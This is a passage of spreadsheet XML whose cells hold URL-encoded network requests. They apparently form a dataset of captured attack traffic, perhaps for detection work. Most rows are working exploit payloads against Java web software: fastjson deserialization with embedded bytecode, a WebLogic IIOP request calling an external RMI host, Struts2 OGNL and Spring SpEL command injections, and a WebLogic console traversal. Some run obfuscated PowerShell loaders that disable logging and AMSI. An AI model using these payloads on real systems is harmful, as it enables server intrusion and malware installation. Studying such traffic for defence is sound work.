        <v>POST%20%2Fexploit%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%2010.0%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F40.0.2214.93%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%201298%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20application%2Fjson%0A%0A%7B%0A%20%20%22param%22%3A%20%5B%0A%20%20%20%20%22com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl%22%2C%0A%20%20%20%20%7B%0A%20%20%20%20%20%20%22transletBytecodes%22%3A%20%5B%0A%20%20%22yv66vgAAADMAKAoABAAUCQADABUHABYHABcBAAVwYXJhbQEAEkxqYXZhL2xhbmcvT2JqZWN0OwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAcTGNvbS9iMW5nei9zZWMvbW9kZWwvVGFyZ2V0OwEACGdldFBhcmFtAQAUKClMamF2YS9sYW5nL09iamVjdDsBAAhzZXRQYXJhbQEAFShMamF2YS9sYW5nL09iamVjdDspVgEAClNvdXJjZUZpbGUBAAtUYXJnZXQuamF2YQwABwAIDAAFAAYBABpjb20vYjFuZ3ovc2VjL21vZGVsL1RhcmdldAEAEGphdmEvbGFuZy9PYmplY3QBAAg8Y2xpbml0PgEAEWphdmEvbGFuZy9SdW50aW1lBwAZAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwwAGwAcCgAaAB0BABV0b3VjaCAvdG1wL3Byb3ZlMS50eHQIAB8BAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7DAAhACIKABoAIwEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQHACUKACYAFAAhAAMAJgAAAAEAAgAFAAYAAAAEAAEABwAIAAEACQAAAC8AAQABAAAABSq3ACexAAAAAgAKAAAABgABAAAABgALAAAADAABAAAABQAMAA0AAAABAA4ADwABAAkAAAAvAAEAAQAAAAUqtAACsAAAAAIACgAAAAYAAQAAAAoACwAAAAwAAQAAAAUADAANAAAAAQAQABEAAQAJAAAAPgACAAIAAAAGKiu1AAKxAAAAAgAKAAAACgACAAAADgAFAA8ACwAAABYAAgAAAAYADAANAAAAAAAGAAUABgABAAgAGAAIAAEACQAAABYAAgAAAAAACrgAHhIgtgAkV7EAAAAAAAEAEgAAAAIAEw%3D%3D%22%0A%20%20%20%20%20%20%5D%2C%0A%20%20%20%20%20%20%22transletName%22%3A%20%22a.b%22%2C%0A%20%20%20%20%20%20%22outputProperties%22%3A%20%7B%7D%0A%20%20%20%20%7D%0A%20%20%5D%0A%7D</v>
      </c>
    </row>
    <row r="45" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A45" s="2" t="s">
        <v>125</v>
      </c>
      <c r="B45" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C45" t="s">
        <v>159</v>
      </c>
      <c r="D45" t="str">
        <f t="shared" si="0"/>
        <v>GET%20%2Fstatic%3F%2F%252557EB-INF%2Fweb.xml%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010_8_3%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F54.0.2866.71%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="46" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A46" s="2" t="s">
        <v>124</v>
      </c>
      <c r="B46" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C46" t="s">
        <v>160</v>
      </c>
      <c r="D46" t="str">
        <f t="shared" si="0"/>
        <v>GET%20%2Frobots%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%206.4%3B%20WOW64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F41.0.2225.0%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="47" spans="1:4" ht="18" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A47" s="2" t="s">
        <v>123</v>
      </c>
      <c r="B47" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C47" t="s">
        <v>253</v>
      </c>
      <c r="D47" t="str">
        <f t="shared" si="0"/>
        <v>GIOP%01%02%05%02%03xBEA%08%01%03%0CAdminServer3IDL%3Aweblogic%2Fcorba%2Fcos%2Fnaming%2FNamingContextAny%3A1.0%028%01BEA%2A%10s%03th%05%E1%91%80%0Brebind_any%06%05%18%01%0A127.0.0.1%26%01%0C%01%20%05%01%01%06%28IDL%3Aomg.org%2FSendingContext%2FCodeBase%3A1.0%01%01%02%0A127.0.0.1%26dBEA%08%01%03%01%28IDL%3Aomg.org%2FSendingContext%2FCodeBase%3A1.0%0312%01BEA%2A%10%7F%D4%B3%0A%01%01%2C%01%20%03%01%20%01%01%05%01%01%01%01%03%01%01%01%01%09%05%01%01%0F%20%01%01BEA%03%14%05%E1%91%80BEA%04%0A%03%06%01%13Y4er545437464632254%01%1D%1C%01%01%7F%02%3ERMI%3Aweblogic.iiop.ProxyDesc%3A73CD9A45CBA52938%3A74261801B931EF00%7F%02YRMI%3Asun.reflect.annotation.AnnotationInvocationHandler%3AC003BED76E3338BB%3A55CAF50F15CB7EA5%7F%0A8RMI%3Ajava.util.HashMap%3A86573568A211C011%3A0507DAC1C31660D1%15%01%01%3F%40%0C%10%01%7F%0A%23IDL%3Aomg.org%2FCORBA%2FWStringValue%3A1.0%18%14pwned545437459779884%01%7F%0AtRMI%3Acom.bea.core.repackaged.springframework.transaction.jta.JtaTransactionManager%3A0D3048E07B1D3B7B%3A4EF3ECFBB628982F%1C%01%01%01%01%01%7F%0A%0C%20%1Crmi%3A%2F%2F121.36.44.128%3A7000%2Fexp%7F%02%40RMI%3Ajavax.rmi.CORBA.ClassDesc%3A2BABDA04587ADCCC%3ACFBF02CF5294176B%7F%02%7F%02%27RMI%3Ajava.lang.Override%3A0000000000000000%7F%029RMI%3A%5BLjava.lang.Class%3B%3A071DA8BE7F971128%3A2C7E5503D9BF9553%01%7F%02%24%60%7F%02%EC%80%80%24RMI%3Ajava.rmi.Remote%3A0000000000000000</v>
      </c>
    </row>
    <row r="48" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A48" s="2" t="s">
        <v>122</v>
      </c>
      <c r="B48" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C48" t="s">
        <v>161</v>
      </c>
      <c r="D48" t="str">
        <f t="shared" si="0"/>
        <v>GET%20%2Fjbossmq-httpil%2FHTTPServerILServlet%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28X11%3B%20OpenBSD%20i386%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F36.0.1985.125%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="49" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A49" s="2" t="s">
        <v>121</v>
      </c>
      <c r="B49" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C49" t="s">
        <v>254</v>
      </c>
      <c r="D49" t="str">
        <f t="shared" si="0"/>
        <v>GET%20%2Fback.txt%20HTTP%2F1.1%0AUser-Agent%3A%20Lavf%2F56.40.101%0AAccept%3A%20%2A%2F%2A%0ARange%3A%20bytes%3D0-%0AConnection%3A%20close%0AHost%3A%2010.82.200.214%3A8080%0AIcy-MetaData%3A%201%0A</v>
      </c>
    </row>
    <row r="50" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A50" s="2" t="s">
        <v>120</v>
      </c>
      <c r="B50" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C50" t="s">
        <v>162</v>
      </c>
      <c r="D50" t="str">
        <f t="shared" si="0"/>
        <v>GET%20%2F%24%257b%28%2523_memberAccess%5B%2527allowStaticMethodAccess%2527%5D%3Dtrue%29.%28%2523p%3Dnew%2520java.lang.ProcessBuilder%28%257b%2527cmd.exe%2527%2C%2527%2Fc%2527%2C%2527powershell.exe%2520-nop%2520-w%2520hidden%2520-noni%2520-ep%2520bypass%2520%2522%26%28%5Bscriptblock%5D%3A%3Acreate%28%28New-Object%2520System.IO.StreamReader%28New-Object%2520System.IO.Compression.GzipStream%28%28New-Object%2520System.IO.MemoryStream%28%2C%5BSystem.Convert%5D%3A%3AFromBase64String%28%28%28%2527H4sIAPfoH2MCA5VVXW8aORR951dcoelmRgEL2KrqRkpVOk1XkbIt6mQ3DwgpxnMJszE2a3sCKOG%2F157xfBASbesHGPteHx%2Bfe2wvcsFMJgX8iaZ%2Fg3PGMxQGOo8dsC3YMDiHr7jpf5v%2Fi8xA%2F3q3xq90%257b1%257dXbQEJsfF%2FlVMvlb42dc0JybWGFqIxnl2kIERuVYZ02U3O7Isww73%2527%2B%2527%257b1%257dqpcjv7zq%2527%2B%2527KiuJYbVLZn2UERn1BFV2H5PU2MysTdLIjlakVF2jscTTRnUjwb%2FCw3gkuaFqORx1SSodbgBVjJNOfoCH4MIy%257b1%257dTsgWE1TLQx%2F%2BgO89E2o2KYDmvmMszbVCgspOnyc5%2Br4%257b1%257dTLZHsHo0m12x95TNmb207nki0ocq4df3KRdSX6LyVN2YM18YCluUISyr71%2BgqfECl8Z%257b1%257dxDd0q%2BUvM44lfqDv8%2527%2B%2527Y0SG796T0dv3ZPj7qNt%2527%2B%2527zO%2FHLd0oJtVFIV45vCU%2Bs1ZJizPJsGJYVKgk6t3R9QVr0tOZJBfYKQ2S5ysyOJFVq6NfvBQtr%2527%2B%2527K%2ByFj8G1Rd%2527%2B%25279Dn2qYHsz5jitpMEZlskXGqMF%2FKM9S6rwXU87nlN3PougFOmScm6Uzrps01q9qE4ic817XcD10vYJQG68WqtloW8npfGdwOpsF7t9ZckDI%2527%2B%2527aG%2527%2B%2527Db05vHwd6LjSKtwuHU4NYQFEymzu9nZ%2BMkvryMXAE%2BuZywe2ONKzcaJu5oJUvkHFQu%257b1%257dM0GK0%2BurXm7cAoBiocz1xPu6J%2FaMVupOsDkap2bJngrYrneqexuaSCMI%2FgrY0pquTAQS7WWqlCUwNgt5pI0KLTYD5iSW3ErvC29HOTG1gbDZmO9Qa%2FpkCsUd2bZ9lF1qNtOOjLSr6k0PZ3BlYV0svgLgdQ8f51rNeuLVBeULS3nE%257b1%257dQyUV84TVZD27Xw4J6OSLXb8kqrkKKnS%2FEg77F%2FsV1bbbXVu0bZty21WWYcwzDICteVm%2FiONA1Lj%2FVg0IPggH0EfYEwOJL0wumH6bXV8rUn%2527%2B%2527w59Tl0IKjS%2B85g2KPW3UUWm%257b1%257d%2Beui2F0lKgRZ9Kya9nC6Y%257b1%257d7tG%2FrV1VeCjz78NoQn%2BJabfokK3jwHUCMoBKmAT%2BFkksCJ%2FS%2F0v5Ks8HBEJtQsXfQDnDQgW0ckQK%2527%2B%2527Wkmg5mB4u1WBdxwj%257b1%257dSFUYvMT%257b1%257dvd%2BxR23aODfxT%2Fm1g%2FtexbcMe%2BbWa84Xnelm%2F%257b1%2527%2B%2527%257dv7i8Xd7zKVGv5%2FiOFZvVNswz%2527%2B%2527cO%2527%2B%2527VGLmuXiv%2Fa51ZP%2FR17dwD%2BwOSdLPeqwgAAA%257b0%257d%257b0%257d%2527%29-f%2527%3D%2527%2C%2527h%2527%29%29%29%29%2C%5BSystem.IO.Compression.CompressionMode%5D%3A%3ADecompress%29%29%29.ReadToEnd%28%29%29%29%2522%2527%257d%29%29.%28%2523p.redirectErrorStream%28true%29%29.%28%2523process%3D%2523p.start%28%29%29.%28%2523r%3D%28%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy%28%2523process.getInputStream%28%29%2C%2523r%29%29.%28%2523r.flush%28%29%29%257d%2Fshowcase.action%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%206.3%3B%20WOW64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F41.0.2225.0%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="51" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A51" s="2" t="s">
        <v>119</v>
      </c>
      <c r="B51" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C51" t="s">
        <v>163</v>
      </c>
      <c r="D51" t="str">
        <f t="shared" si="0"/>
        <v>POST%20%2Fusers%3Fpage%26size%3D5%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28X11%3B%20Ubuntu%3B%20Linux%20i686%20on%20x86_64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F53.0.2820.59%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%20124%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20application%2Fx-www-form-urlencoded%0APragma%3A%20no-cache%0A%0Ausername%5B%23this.getClass%28%29.forName%28%22java.lang.Runtime%22%29.getRuntime%28%29.exec%28%22touch%2B%2Ftmp%2Fsuccess%22%29%5D%3D%26password%3D%26repeatedPassword%3D</v>
      </c>
    </row>
    <row r="52" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A52" s="2" t="s">
        <v>118</v>
      </c>
      <c r="B52" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C52" t="s">
        <v>139</v>
      </c>
      <c r="D52" t="str">
        <f t="shared" si="0"/>
        <v>POST%20%2F%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010_9_2%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F52.0.2762.73%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%200%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20%25%7B%28%23_%3D%27multipart%2Fform-data%27%29.%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27echo%20pwn%5Etest123%20pwn%241test123%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2Fc%27%2C%23cmd%7D%3A%7B%27%2Fbin%2Fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%28%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D%0A</v>
      </c>
    </row>
    <row r="53" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A53" s="2" t="s">
        <v>117</v>
      </c>
      <c r="B53" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C53" t="s">
        <v>164</v>
      </c>
      <c r="D53" t="str">
        <f t="shared" si="0"/>
        <v>POST%20%2FfunctionRouter%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%204.0%3B%20WOW64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F37.0.2049.0%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%200%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20application%2Fx-www-form-urlencoded%0ASpring.cloud.function.routing-Expression%3A%20T%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22touch%20%2Ftmp%2FRCE%22%29%0A</v>
      </c>
    </row>
    <row r="54" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A54" s="2" t="s">
        <v>116</v>
      </c>
      <c r="B54" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C54" t="s">
        <v>165</v>
      </c>
      <c r="D54" t="str">
        <f t="shared" si="0"/>
        <v>POST%20%2Fconsole%2Fcss%2F.%25252e%2Fconsole.portal%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28X11%3B%20Linux%20x86_64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F41.0.2227.0%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%206684%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20application%2Fx-www-form-urlencoded%0A%0Ahandle%3Dcom.tangosol.coherence.mvel2.sh.ShellSession%2528%2527java.lang.Runtime.getRuntime%2528%2529.exec%2528new%2520java.lang.String%255b%255d%2520%257b%2522cmd.exe%2522%252c%2520%2522%2Fc%2522%252c%2520new%2520java.lang.String%2528java.util.Base64.getDecoder%2528%2529.decode%2528%2522cG93ZXJzaGVsbC5leGUgLW5vcCAtdyBoaWRkZW4gLW5vbmkgLWMgImlmKFtJbnRQdHJdOjpTaXplIC1lcSA0KXskYj0kZW52OndpbmRpcisnXHN5c25hdGl2ZVxXaW5kb3dzUG93ZXJTaGVsbFx2MS4wXHBvd2Vyc2hlbGwuZXhlJ31lbHNleyRiPSdwb3dlcnNoZWxsLmV4ZSd9OyRzPU5ldy1PYmplY3QgU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3NTdGFydEluZm87JHMuRmlsZU5hbWU9JGI7JHMuQXJndW1lbnRzPSctbm9uaSAtbm9wIC13IGhpZGRlbiAtYyAgJGV6Tj1bQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5W3N0cmluZyxTeXN0ZW0uT2JqZWN0XV06Om5ldygpOyAkY2g9KCgnJ0VuYXsyfWxlJycrJyd7MH1jJycrJydyaXAnJysnJ3szfUJsb2MnJysnJ3snJysnJzF9TG9nZ2luZycnKS1mJydTJycsJydrJycsJydiJycsJyd0JycpOyAkcHhVUT0oKCcnU2NyaScnKycncHsxfUJ7MH1vYycnKycna0xvJycrJydnZ2l7Mn1nJycrJycnJyktZicnbCcnLCcndCcnLCcnbicnKTtJZigkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uLk1ham9yIC1nZSAzKXsgJHF5Uz1bUmVmXS5Bc3NlbWJseS5HZXRUeXBlKCgoJyd7NH17MX0nJysnJ3N0ZW0uJycrJyd7JycrJyc1JycrJyd9JycrJydhbmF7MicnKycnfWVtZW4nJysnJ3QuJycrJyd7N317MH10eycnKycnOH0nJysnJ20nJysnJ2F0ezl9eycnKycnOH1uLicnKycnezd9bXN7OScnKycnfXs2JycrJyd9JycrJyd0eycnKycnOX17JycrJyczJycrJyd9JycrJydzJycpLWYnJ3UnJywnJ3knJywnJ2cnJywnJ2wnJywnJ1MnJywnJ00nJywnJ1UnJywnJ0EnJywnJ28nJywnJ2knJykpOyAkaVJrPVtSZWZdLkFzc2VtYmx5LkdldFR5cGUoKCgnJ1N7MX1zdGVtLicnKycnezJ9YW5hezN9ZScnKycnbWVudCcnKycnLns1fXUnJysnJ3RvJycrJydtYXRpb24uezAnJysnJ310aXs0fXMnJysnJycnKS1mJydVJycsJyd5JycsJydNJycsJydnJycsJydsJycsJydBJycpKTsgJHRnPSgoJydFbicnKycnYXsyfWxlU2NyaXB0ezN9bCcnKycnbycnKycnY3swJycrJyd9JycrJyd7NX1uezF9b2NhdGlvbnsnJysnJzR9JycrJydvZ2dpbmcnJyktZicnaycnLCcndicnLCcnYicnLCcnQicnLCcnTCcnLCcnSScnKTsgJGpxMj0kaVJrLkdldEZpZWxkKCcnY2FjaGVkR3JvdXBQb2xpY3lTZXR0aW5ncycnLCcnTm9uUHVibGljLFN0YXRpYycnKTsgaWYgKCRxeVMpIHsgJHF5Uy5HZXRGaWVsZCgoKCcnJycrJydhezR9JycrJyd7MCcnKycnfWknJysnJ0knJysnJ3syfWl7JycrJyczfUZhJycrJydpezF9JycrJydlZCcnKS1mJydzJycsJydsJycsJyduJycsJyd0JycsJydtJycpLCcnTm9uUHVibGljLFN0YXRpYycnKS5TZXRWYWx1ZSgkbnVsbCwkdHJ1ZSk7IH07IElmICgkanEyKSB7ICRiMElUPSRqcTIuR2V0VmFsdWUoJG51bGwpOyBJZigkYjBJVFskcHhVUV0peyAkYjBJVFskcHhVUV1bJHRnXT0wOyAkYjBJVFskcHhVUV1bJGNoXT0wOyB9ICRlek4uQWRkKCR0ZywwKTsgJGV6Ti5BZGQoJGNoLDApOyAkYjBJVFsnJ0hLRVlfTE9DQUxfTUFDSElORVxTb2Z0d2FyZVxQb2xpY2llc1xNaWNyb3NvZnRcV2luZG93c1xQb3dlclNoZWxsXCcnKyRweFVRXT0kZXpOOyB9IEVsc2UgeyBbUmVmXS5Bc3NlbWJseS5HZXRUeXBlKCgoJycnJysnJ1MnJysnJ3swfXN0ZScnKycnbS57MScnKycnfWFuJycrJydhZ2VtZW50LnszJycrJyd9ezJ9dG9tYXRpJycrJydvbi5TY3s0fWlwdEJ7NX1vJycrJydjaycnKS1mJyd5JycsJydNJycsJyd1JycsJydBJycsJydyJycsJydsJycpKS5HZXRGaWVsZCgnJ3NpZ25hdHVyZXMnJywnJ05vblB1YmxpYyxTdGF0aWMnJykuU2V0VmFsdWUoJG51bGwsKE5ldy1PYmplY3QgQ29sbGVjdGlvbnMuR2VuZXJpYy5IYXNoU2V0W3N0cmluZ10pKTsgfX07Jihbc2NyaXB0YmxvY2tdOjpjcmVhdGUoKE5ldy1PYmplY3QgU3lzdGVtLklPLlN0cmVhbVJlYWRlcihOZXctT2JqZWN0IFN5c3RlbS5JTy5Db21wcmVzc2lvbi5HemlwU3RyZWFtKChOZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoKCgnJ0g0c0lBSHo2R21NQ0E3VlgrMi9pU0JMK2ZhWDlINndWRWtaRHdFNUlkakxTU0dkakc1dkI1dUZYZ0VVbll6ZDJROXNtZmdTVHZmM2ZyOXBBa3RGa2R1ZE9tcFpRM0k5NjlGZGZWVmMyWmVJWE9FMlk0MkhJL3swfW5yTDh4NVRMek1peG0yRVc0R2JhYXgxbHEnJysnJ3ZXNDF5VjZJajg1bGhsOEorTDZXeGg1ezB9VnAwLzlNc3RRVXB6bW5RRXFoRHhIOFpwZ2xMTXQ1aitNRzZFTVhZM1hXK1FYJycrJyd6SjlNNDkrZEFVblhIamtmTy9ZOXswfTBMTWxaQUVkRytVK2g3MXEyezB9dUNTN1k1aDkvTkZ2TEszN1ZrUjlMaitSczB6em1CWW83QVNITkZ2TlhpeHEwam52RU5uWHNaMm1lYm9xT2k1T2I2NDZkNU40R0dhRHRDZW1vaScnKycnTklnYjgnJysnJ0p0WHUrVG9hTE1rdk8xcUo3VEtiWUpuNU1zOVlVZ3lGQ2VOOXZNa2xwWXJsYi9ZcGRuODdNeUtYQ01PbHBTb0N6ZG15aDd3ajdLTzZxWEJBVE4wR1lGVW1hUjRTUmN0VnB3N0NuZEliYVJsSVMwbWY5RkRXJycrJyd1Z3d3VzhIeFZpM3dyQnFVbVJ0ZG9RMC9jdXFxZEJTZEJKdHswfW1PcDVRSUxSZ25NZ0IrZjFFSU54ZjI1QTlDVWJ6RG45ZUZ5MWpXT3doY1ppZHBqbXZwend6WFpuU3c3UlZwUnBuVnNMSVN0Vll2Z0RPJycrJydOT0dyL3FDNytJZ2hpai8wWnJDeWRGQWVyVi9tdnd0ODRhezB9VEk5Nmtzb1ExT2tIUk12Qmo3RjdheTd3VUViUWlxOGVoY2pobmdIdHM4YjZCQVFnU0ZYa0VScHJ6NFJreU9jZkVpSzVhWUJDZ1RmQWhxRGw1QnZGdGZPM01LR3R2VUVoM0ZnTnhwRGtSdGJDQkgwT1gwT1MrT0YrdDBEb2VhZmVMbGVadVpsSkNrZnBzeGtVZFEwR2FFSk1mbkxhRXMwdnF6K2VxdVhwSUMrMTVlWE5TdFdsK0JlVGJhVDVPOHlFb2ZJZ29BV09ZZStkZ2pGSTgybytJQScnKycnaVVjVGh4Zmp6WGZSNkh1RVFPS0FwaScnKycnZUlCcXhRRk15QzhpUUR7MH00RVRyWTZKQ2kzZUV4VERpYnBnS01RTG9UeWNrNk9tbFJlaW97MH1tdWs1Y0VPTEdkWW5JQjQ0MkxFR2lUcEVXYmNYQldRezB9R2grQUt2L2c4SHZxMDU0RWsvUStlWXNKZTBXb3JIZ3RLK2tkenRTNXV5OHd4T0RVVldBQXhLbHNhaWw2TzczcW02c0w5MVpTemRUcVQwV1lBaEs3T3BJNXEyczlEMFlFaE1yVERuTWg3WlVhUmhYZ3RoZnJSbHJqcmE0YVRnOWw5TVNSVXlxWW8yZ3BacnNpb2VwN3dvK0NyKzNSbUt0ZzF5dUQrYWJpdE5DTVE0ZkFqbi9ZTTJpUjQwTU5RZmhWb0lmMFV0OGtWdXdZVWlwNGd5NW9UUW5LcFR6SVh6SHI4d2RKOW8zWTlFeE0rbVpncXFTKzFOZlhVb2VSWFlrWHM5OWFHeUJFTWZDcEV5RGhUK1dvbW9qaDNWc2RnTlJwSmN6MzA2bjg1ekdjdGdSMWJtVXlkQ3JyTVhYVmxaVEoyOUZuNDRoRk5uMU8wcGtRanInJysnJ0dxNUdlN01MZytjQmg4SXkxN2Mzbm51N1g4Y09CeGk1cHBaRXByL3BXNm9maTkydVkvT0docEZpdVR1dU9sQjhIQU5rMGpzbmlSTUtxekRwT25kaS9WV05MYTNVclhsdnROVzRjYjlYNmMrYTRPN3c4R0FuNm1HU0EnJysnJ3lnaXZiZGxYNmVTemNWM1RpL2VWQlFxUWVyeWFPdlNyeEYvL3poVFo0TTVMNW97MH12REVaRC9RYi9TRjgxdU5LblhKS0wxQUNSUjhZNW13cjN2cURSVHh6akNKd0FFOGxlbHhMOHZ7MH1ZMXA5MVorRjZxbjA5ZHNqWWNFaXlIbFRtZW1lVWhyWGpiQ0pPJycrJydmQ2U0OHgvMnFhTU9iWU5NajY0VGJXZicnKycnMkxUK3pGN08xR294bmcyQzJjQU5yNU83N0ZnOHh2REcrZ0p4a3VtVGpLb3ZCL0ZrMDdHM0V1WU84c2dkRHgxVURKMUFkeGI4ZWNnWW5WODZOWTNqTy9HaVJoVzV4a2VaSTBkUycnKycnbDlvbHk3Y2F6Mll5cjVxWkZibTM3L2xGM1ppTm4wT3swfU5PTEFzTitYVzNIMisyQTIvb0Yzd0hPd08xNllxeXRPYmhZZWNtU3swfUlnQ1dvaGhqWE9KcWpVTkFmcycnKycnVnlqcjRpV3pRSE9aZUdNdGs5ZDNzYkRLazYvezB9SEI0K05GTk4nJysnJ3k0WnBxR2tReDdFdzk0Z2xhY09HWmFKTTBqU2VTM2V2WGRBcCcnKycnMmpSZUgyMGFSNmMnJysnJ1l3MWNHRTNuY3dSY0FEN3pLcmRWRC97MH1RZ2xnT3k1MTFNSkJ3a1FjKzMzTkNXVDdlS1RibHYrVzZlNGgvezB9T1EnJysnJ2diMlFaZkJPRWFTMUg4TTcrWUwvSTdYaXdveVVKL0NyNGVXQVQwa2lvZmYxZ3gzZnkzaHYyTGp5eHNWVDErOHBCTlkrTE5GY2hkeVRxRjBlMmtqdElCWmR5N2FuezB9cDJUZDVhZWZ7MH0vOEcnJysnJ0ZXUnA0NlM0dVY0MW5xMzUwNWErcmIvKzBxaWs3RTBaK1Y3bm9IdFpIbmtFeWcnJysnJ3QwQkpmeXJxU1pjbjdtSnltbUVpeExtOFVkeWhKRW9NR0NGdXhTR2dWQ1VwLzJHS2QrQUJxY1U5dEJ1eUJicTkxNjc2dkZ2QnhzdmZZZWw2VnswfW54YmdKWlRidWhwMlJpZ0ppNicnKycnak5WVGNjQjIwRFYzRzl1clQrK09YNjZmN0luclMxYWVkQjBYbFJUMnIxb0JGdkdKYjk2WWhCZzEnJysnJ25BYy9jM21IMHswfXswfXJDOWd5Y0szc3ZUMjBGQkZOT1V2SVh3ZExNWFJud0ZJQ0RIdytXWHRMczhjUVZVWEtGJycrJydIcGxIUTV1dHRNJycrJyc5YzQ5SDRxZTg1ezB9WUFSL2duOWt6K3ZhMyt6K0VLTzRkbzN7MH1ONnRmTDd4cEhINGVBcTZIQ3pob3drdE8wS21yL0E0UTU0eDVFK05ERDVKaGN4NzB7MH02JycrJycxeFdWd1owTGZYM2NSL0FjT1pEVXJoRFFBQScnKS1mJydQJycpKSkpLFtTeXN0ZW0uSU8uQ29tcHJlc3Npb24uQ29tcHJlc3Npb25Nb2RlXTo6RGVjb21wcmVzcykpKS5SZW